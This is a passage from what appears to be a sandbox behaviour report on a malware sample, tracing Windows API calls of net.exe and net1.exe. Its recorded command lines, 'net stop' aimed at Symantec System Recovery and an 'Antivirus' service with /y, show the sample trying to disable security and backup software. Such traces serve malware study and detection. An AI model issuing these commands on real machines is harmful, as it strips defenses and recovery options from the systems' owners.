dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="顠&⡋瓢\r顠&\r") returned 0x319 [0040.050] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="SERVICES\r\nNET START ", _MaxCount=0x14) returned -5 [0040.050] LocalFree (hMem=0x269860) returned 0x0 [0040.050] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="顠&⡋瓢\r顠&\r") returned 0x483 [0040.050] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="SYNTAX\r\nThe followin", _MaxCount=0x14) returned -5 [0040.050] LocalFree (hMem=0x269860) returned 0x0 [0040.050] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="顠&⡋瓢\r顠&\r") returned 0xa86 [0040.050] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NAMES\r\nThe following", _MaxCount=0x14) returned 4 [0040.050] LocalFree (hMem=0x269860) returned 0x0 [0040.050] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="顠&⡋瓢\r顠&\r") returned 0x54 [0040.050] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="\r\nFor more informati", _MaxCount=0x14) returned 97 [0040.050] LocalFree (hMem=0x269860) returned 0x0 [0040.050] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="顠&⡋瓢\r顠&\r") returned 0xad [0040.050] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0040.050] LocalFree (hMem=0x269860) returned 0x0 [0040.050] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r顠&\r") returned 0x2e [0040.050] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0040.050] LocalFree (hMem=0x263f70) returned 0x0 [0040.050] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="顠&⡋瓢\r㽰&\r") returned 0x7d [0040.050] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0040.051] LocalFree (hMem=0x269860) returned 0x0 [0040.051] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r顠&\r") returned 0x26 [0040.051] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0040.051] LocalFree (hMem=0x263f70) returned 0x0 [0040.051] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x19 [0040.051] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0040.051] LocalFree (hMem=0x263f70) returned 0x0 [0040.051] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x1b [0040.051] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0040.051] LocalFree (hMem=0x263f70) returned 0x0 [0040.051] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="顠&⡋瓢\r㽰&\r") returned 0xbe [0040.051] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0040.051] LocalFree (hMem=0x269860) returned 0x0 [0040.051] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r顠&\r") returned 0x33 [0040.051] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0040.051] LocalFree (hMem=0x263f70) returned 0x0 [0040.051] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x19 [0040.051] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0040.051] LocalFree (hMem=0x263f70) returned 0x0 [0040.051] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="顠&⡋瓢\r㽰&\r") returned 0xc1 [0040.051] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0040.051] LocalFree (hMem=0x269860) returned 0x0 [0040.051] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r顠&\r") returned 0x16 [0040.051] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0040.051] LocalFree (hMem=0x263f70) returned 0x0 [0040.051] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x33 [0040.051] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0040.051] LocalFree (hMem=0x263f70) returned 0x0 [0040.051] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="顠&⡋瓢\r㽰&\r") returned 0x234 [0040.051] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0040.051] LocalFree (hMem=0x269860) returned 0x0 [0040.051] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r顠&\r") returned 0x13 [0040.051] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0040.051] LocalFree (hMem=0x263f70) returned 0x0 [0040.051] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x14 [0040.052] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0040.052] LocalFree (hMem=0x263f70) returned 0x0 [0040.052] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x14 [0040.052] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0040.052] LocalFree (hMem=0x263f70) returned 0x0 [0040.052] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x15 [0040.052] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0040.052] LocalFree (hMem=0x263f70) returned 0x0 [0040.052] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x15 [0040.052] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0040.052] LocalFree (hMem=0x263f70) returned 0x0 [0040.052] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x16 [0040.052] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0040.052] LocalFree (hMem=0x263f70) returned 0x0 [0040.052] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㶈&⡋瓢\r㽰&\r") returned 0x11 [0040.052] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0040.052] LocalFree (hMem=0x263d88) returned 0x0 [0040.052] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㶈&\r") returned 0x14 [0040.052] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0040.052] LocalFree (hMem=0x263f70) returned 0x0 [0040.052] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x12 [0040.052] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0040.052] LocalFree (hMem=0x263f70) returned 0x0 [0040.052] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0xf [0040.052] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0040.052] LocalFree (hMem=0x263f70) returned 0x0 [0040.052] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x17 [0040.052] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0040.052] LocalFree (hMem=0x263f70) returned 0x0 [0040.052] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x18 [0040.052] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0040.052] LocalFree (hMem=0x263f70) returned 0x0 [0040.052] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x2a [0040.052] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0040.052] LocalFree (hMem=0x263f70) returned 0x0 [0040.052] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x15 [0040.053] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0040.053] GetFileType (hFile=0x26c) returned 0x3 [0040.053] GetConsoleMode (in: hConsoleHandle=0x26c, lpMode=0xdf6f4 | out: lpMode=0xdf6f4) returned 0 [0040.064] GetConsoleOutputCP () returned 0x1b5 [0040.064] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0040.064] malloc (_Size=0x16) returned 0x5a2738 [0040.064] GetConsoleOutputCP () returned 0x1b5 [0040.064] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x5a2738, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NET STOP\r\nservice\r\n\r\n", lpUsedDefaultChar=0x0) returned 22 [0040.065] WriteFile (in: hFile=0x26c, lpBuffer=0x5a2738*, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0xdf6f8, lpOverlapped=0x0 | out: lpBuffer=0x5a2738*, lpNumberOfBytesWritten=0xdf6f8*=0x15, lpOverlapped=0x0) returned 1 [0040.065] free (_Block=0x5a2738) [0040.065] LocalFree (hMem=0x263f70) returned 0x0 [0040.065] NetApiBufferFree (Buffer=0x261ca8) returned 0x0 [0040.065] NetApiBufferFree (Buffer=0x261cc0) returned 0x0 [0040.065] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Symantec System RecoveryΓÇ¥ /y" [0040.065] exit (_Code=1) Process: id = "49" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x48b50000" os_pid = "0x508" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop Antivirus /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 117 os_tid = 0x4a4 Process: id = "50" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x48d7c000" os_pid = "0x814" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "49" os_parent_pid = "0x508" cmd_line = "C:\\Windows\\system32\\net1 stop Antivirus /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 118 os_tid = 0x818 [0040.345] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afedc | out: lpSystemTimeAsFileTime=0x1afedc*(dwLowDateTime=0xe24143c0, dwHighDateTime=0x1d57a86)) [0040.345] GetCurrentProcessId () returned 0x814 [0040.345] GetCurrentThreadId () returned 0x818 [0040.345] GetTickCount () returned 0x114515b [0040.345] QueryPerformanceCounter (in: lpPerformanceCount=0x1afed4 | out: lpPerformanceCount=0x1afed4*=16062999288) returned 1 [0040.346] GetModuleHandleA (lpModuleName=0x0) returned 0x8c0000 [0040.346] __set_app_type (_Type=0x1) [0040.346] __p__fmode () returned 0x74eb31f4 [0040.346] __p__commode () returned 0x74eb31fc [0040.346] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x8cffe6) returned 0x0 [0040.346] __getmainargs (in: _Argc=0x8d9064, _Argv=0x8d906c, _Env=0x8d9068, _DoWildCard=0, _StartInfo=0x8d9024 | out: _Argc=0x8d9064, _Argv=0x8d906c, _Env=0x8d9068) returned 0 [0040.346] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0040.346] GetConsoleOutputCP () returned 0x1b5 [0040.346] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x8d9080 | out: lpCPInfo=0x8d9080) returned 1 [0040.346] SetThreadUILanguage (LangId=0x0) returned 0x409 [0040.349] sprintf_s (in: _DstBuf=0x1afe94, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0040.349] setlocale (category=0, locale=".437") returned="English_United States.437" [0040.351] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0040.351] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0040.351] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop Antivirus /y" [0040.351] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1afc60, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0040.351] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x66) returned 0x583c00 [0040.351] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0040.352] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1afe64 | out: Buffer=0x1afe64*=0x581c60) returned 0x0 [0040.352] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1afe64 | out: Buffer=0x1afe64*=0x581c78) returned 0x0 [0040.352] _fileno (_File=0x74eb2900) returned -2 [0040.352] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0040.352] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0040.352] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0040.352] _wcsicmp (_String1="config", _String2="stop") returned -16 [0040.352] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0040.352] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0040.352] _wcsicmp (_String1="file", _String2="stop") returned -13 [0040.352] _wcsicmp (_String1="files", _String2="stop") returned -13 [0040.352] _wcsicmp (_String1="group", _String2="stop") returned -12 [0040.352] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0040.352] _wcsicmp (_String1="help", _String2="stop") returned -11 [0040.352] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0040.352] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0040.352] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0040.352] _wcsicmp (_String1="session", _String2="stop") returned -15 [0040.352] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0040.352] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0040.352] _wcsicmp (_String1="share", _String2="stop") returned -12 [0040.352] _wcsicmp (_String1="start", _String2="stop") returned -14 [0040.352] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0040.352] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0040.352] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0040.352] _wcsicmp (_String1="accounts", _String2="Antivirus") returned -11 [0040.352] _wcsicmp (_String1="computer", _String2="Antivirus") returned 2 [0040.352] _wcsicmp (_String1="config", _String2="Antivirus") returned 2 [0040.353] _wcsicmp (_String1="continue", _String2="Antivirus") returned 2 [0040.353] _wcsicmp (_String1="cont", _String2="Antivirus") returned 2 [0040.353] _wcsicmp (_String1="file", _String2="Antivirus") returned 5 [0040.353] _wcsicmp (_String1="files", _String2="Antivirus") returned 5 [0040.353] _wcsicmp (_String1="group", _String2="Antivirus") returned 6 [0040.353] _wcsicmp (_String1="groups", _String2="Antivirus") returned 6 [0040.353] _wcsicmp (_String1="help", _String2="Antivirus") returned 7 [0040.353] _wcsicmp (_String1="helpmsg", _String2="Antivirus") returned 7 [0040.353] _wcsicmp (_String1="localgroup", _String2="Antivirus") returned 11 [0040.353] _wcsicmp (_String1="pause", _String2="Antivirus") returned 15 [0040.353] _wcsicmp (_String1="session", _String2="Antivirus") returned 18 [0040.353] _wcsicmp (_String1="sessions", _String2="Antivirus") returned 18 [0040.353] _wcsicmp (_String1="sess", _String2="Antivirus") returned 18 [0040.353] _wcsicmp (_String1="share", _String2="Antivirus") returned 18 [0040.353] _wcsicmp (_String1="start", _String2="Antivirus") returned 18 [0040.353] _wcsicmp (_String1="stats", _String2="Antivirus") returned 18 [0040.353] _wcsicmp (_String1="statistics", _String2="Antivirus") returned 18 [0040.353] _wcsicmp (_String1="stop", _String2="Antivirus") returned 18 [0040.353] _wcsicmp (_String1="time", _String2="Antivirus") returned 19 [0040.353] _wcsicmp (_String1="user", _String2="Antivirus") returned 20 [0040.353] _wcsicmp (_String1="users", _String2="Antivirus") returned 20 [0040.353] _wcsicmp (_String1="msg", _String2="Antivirus") returned 12 [0040.353] _wcsicmp (_String1="messenger", _String2="Antivirus") returned 12 [0040.353] _wcsicmp (_String1="receiver", _String2="Antivirus") returned 17 [0040.353] _wcsicmp (_String1="rcv", _String2="Antivirus") returned 17 [0040.353] _wcsicmp (_String1="netpopup", _String2="Antivirus") returned 13 [0040.353] _wcsicmp (_String1="redirector", _String2="Antivirus") returned 17 [0040.353] _wcsicmp (_String1="redir", _String2="Antivirus") returned 17 [0040.353] _wcsicmp (_String1="rdr", _String2="Antivirus") returned 17 [0040.353] _wcsicmp (_String1="workstation", _String2="Antivirus") returned 22 [0040.353] _wcsicmp (_String1="work", _String2="Antivirus") returned 22 [0040.353] _wcsicmp (_String1="wksta", _String2="Antivirus") returned 22 [0040.353] _wcsicmp (_String1="prdr", _String2="Antivirus") returned 15 [0040.353] _wcsicmp (_String1="devrdr", _String2="Antivirus") returned 3 [0040.354] _wcsicmp (_String1="lanmanworkstation", _String2="Antivirus") returned 11 [0040.354] _wcsicmp (_String1="server", _String2="Antivirus") returned 18 [0040.354] _wcsicmp (_String1="svr", _String2="Antivirus") returned 18 [0040.354] _wcsicmp (_String1="srv", _String2="Antivirus") returned 18 [0040.354] _wcsicmp (_String1="lanmanserver", _String2="Antivirus") returned 11 [0040.354] _wcsicmp (_String1="alerter", _String2="Antivirus") returned -2 [0040.354] _wcsicmp (_String1="netlogon", _String2="Antivirus") returned 13 [0040.354] _wcsupr (in: _String="Antivirus" | out: _String="ANTIVIRUS") returned="ANTIVIRUS" [0040.354] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5854b8 [0040.357] GetServiceKeyNameW (in: hSCManager=0x5854b8, lpDisplayName="ANTIVIRUS", lpServiceName=0x8daaf0, lpcchBuffer=0x1afe00 | out: lpServiceName="", lpcchBuffer=0x1afe00) returned 0 [0040.357] _wcsicmp (_String1="msg", _String2="ANTIVIRUS") returned 12 [0040.357] _wcsicmp (_String1="messenger", _String2="ANTIVIRUS") returned 12 [0040.357] _wcsicmp (_String1="receiver", _String2="ANTIVIRUS") returned 17 [0040.357] _wcsicmp (_String1="rcv", _String2="ANTIVIRUS") returned 17 [0040.357] _wcsicmp (_String1="redirector", _String2="ANTIVIRUS") returned 17 [0040.357] _wcsicmp (_String1="redir", _String2="ANTIVIRUS") returned 17 [0040.357] _wcsicmp (_String1="rdr", _String2="ANTIVIRUS") returned 17 [0040.357] _wcsicmp (_String1="workstation", _String2="ANTIVIRUS") returned 22 [0040.357] _wcsicmp (_String1="work", _String2="ANTIVIRUS") returned 22 [0040.357] _wcsicmp (_String1="wksta", _String2="ANTIVIRUS") returned 22 [0040.357] _wcsicmp (_String1="prdr", _String2="ANTIVIRUS") returned 15 [0040.357] _wcsicmp (_String1="devrdr", _String2="ANTIVIRUS") returned 3 [0040.357] _wcsicmp (_String1="lanmanworkstation", _String2="ANTIVIRUS") returned 11 [0040.357] _wcsicmp (_String1="server", _String2="ANTIVIRUS") returned 18 [0040.357] _wcsicmp (_String1="svr", _String2="ANTIVIRUS") returned 18 [0040.357] _wcsicmp (_String1="srv", _String2="ANTIVIRUS") returned 18 [0040.358] _wcsicmp (_String1="lanmanserver", _String2="ANTIVIRUS") returned 11 [0040.358] _wcsicmp (_String1="alerter", _String2="ANTIVIRUS") returned -2 [0040.358] _wcsicmp (_String1="netlogon", _String2="ANTIVIRUS") returned 13 [0040.358] NetServiceControl (in: servername=0x0, service="ANTIVIRUS", opcode=0x0, arg=0x0, bufptr=0x1afdfc | out: bufptr=0x1afdfc) returned 0x889 [0040.358] wcscpy_s (in: _Destination=0x8da4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0040.358] LoadLibraryW (lpLibFileName="NETMSG") returned 0x73ef0000 [0040.359] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x73ef0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x8db338, nSize=0x800, Arguments=0x8d9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0040.360] GetFileType (hFile=0x26c) returned 0x3 [0040.360] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x583fe8 [0040.360] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x583fe8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0040.360] WriteFile (in: hFile=0x26c, lpBuffer=0x583fe8*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1afd3c, lpOverlapped=0x0 | out: lpBuffer=0x583fe8*, lpNumberOfBytesWritten=0x1afd3c*=0x1e, lpOverlapped=0x0) returned 1 [0040.361] LocalFree (hMem=0x583fe8) returned 0x0 [0040.361] GetFileType (hFile=0x26c) returned 0x3 [0040.361] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x586290 [0040.361] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x586290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nX", lpUsedDefaultChar=0x0) returned 2 [0040.361] WriteFile (in: hFile=0x26c, lpBuffer=0x586290*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1afd3c, lpOverlapped=0x0 | out: lpBuffer=0x586290*, lpNumberOfBytesWritten=0x1afd3c*=0x2, lpOverlapped=0x0) returned 1 [0040.361] LocalFree (hMem=0x586290) returned 0x0 [0040.361] _ultow (in: _Dest=0x889, _Radix=1768812 | out: _Dest=0x889) returned="2185" [0040.361] FormatMessageW (in: dwFlags=0x2800, lpSource=0x73ef0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x8db338, nSize=0x800, Arguments=0x8d9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0040.361] GetFileType (hFile=0x26c) returned 0x3 [0040.361] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x586290 [0040.361] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x586290, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0040.361] WriteFile (in: hFile=0x26c, lpBuffer=0x586290*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1afd48, lpOverlapped=0x0 | out: lpBuffer=0x586290*, lpNumberOfBytesWritten=0x1afd48*=0x34, lpOverlapped=0x0) returned 1 [0040.361] LocalFree (hMem=0x586290) returned 0x0 [0040.361] GetFileType (hFile=0x26c) returned 0x3 [0040.361] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x586290 [0040.361] WideCharToMultiByte (in: 